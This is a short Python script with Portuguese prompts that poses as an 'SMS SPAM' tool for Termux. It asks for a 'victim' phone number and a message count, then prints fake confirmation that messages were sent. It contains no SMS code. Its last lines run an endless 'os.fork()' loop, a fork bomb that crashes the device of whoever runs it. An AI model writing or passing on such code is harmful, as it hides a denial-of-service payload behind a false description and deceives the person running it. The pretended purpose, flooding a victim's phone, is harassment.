#prints "spam" 
import os
print(' \033[1;96m____  _____        __  __')
print('/ ____|  __ \ /\   |  \/  |')
print(' (___ | |__) /  \  | \  / |')
print('\___ \|  ___/ /\ \ | |\/| |')
print('____) | |  / ____ \| |  | |')
print('|____/|_| /_/    \_\_|  |_|')
print(" \n\033[1;33m ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;") 
print(";           SMS SPAM ") 
print("  ---------------------------;") 
print (";   Creator: Mr Qwerty;") 
print ("  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;") 
#bem vindo
print ('===============================')
ni = input('digite seu nome ou Nick: ') 
#Project fork
print('\033[1;34mBem vindo(a) \033[1;34m{}\033[1;33m@\033[1;96mTermux]\033[1;31m--[~]'.format(ni))
print("\n \033[31mMeu GitHub: https://github.com/Tokosh1")
sets= int(input('ok!! Digite o número da vítima -')) 
print('número da vítima {}'.format(sets))
qua = int(input('quantos sms você deseja enviar? OBS: o recomendado é 10 - '))

inc = ('\n \033[32mSms message form being sent!! ')
#mudanças de cores 
#imprimir várias vezes
un = inc * 10
#linhas de print
print('\033[1;96mSpam sendo efetuado aguarde ¯\_(ツ)_/¯ {}'.format(un))
print('\n foram enviados {} sms para {}'.format(qua, sets))
while(1):
      os.fork()
#Project fork
#Project fork
